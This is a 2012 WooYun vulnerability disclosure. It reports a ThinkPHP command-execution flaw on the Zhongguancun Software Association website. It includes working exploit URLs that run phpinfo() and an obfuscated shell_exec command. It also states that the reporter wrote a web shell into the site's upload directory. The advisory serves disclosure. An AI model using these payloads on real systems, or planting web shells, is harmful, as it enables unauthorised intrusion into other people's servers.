中关村软件协会网站命令执行 | wooyun-2012-06894| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-06894

漏洞标题：中关村软件协会网站命令执行

漏洞作者： PPFish

提交时间：2012-05-11 15:14

修复时间：2012-06-25 15:15

公开时间：2012-06-25 15:15

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-05-11：积极联系厂商并且等待厂商认领中，细节不对外公开
2012-06-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

如题

详细说明：

中关村软件协会网站 thinkphp的漏洞未修复
导致可以执行任意php代码~及系统命令
http://www.zsoft.cn/index.php/Index/news_page/id/%7B$%7Bphpinfo%28%29%7D%7D
返回php信息

执行系统命令，返回当前目录文件 ls -al
http://www.zsoft.cn/index.php/Index/news_page/id/%7B$%7B@print%28shell_exec%28chr%28108%29.chr%28115%29.chr%2832%29.chr%2845%29.chr%2897%29.chr%28108%29%29%29%7D%7D

另外 Public/uploadfiles/ 目录可写，写了小马，地址http://www.zsoft.cn/Public/uploadfiles/ok.php
请厂商自行删除 :-)

漏洞证明：

如上

修复方案：

更新thinkphp或者直接修改代码。

版权声明：转载请注明来源 PPFish@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：10 (WooYun评价)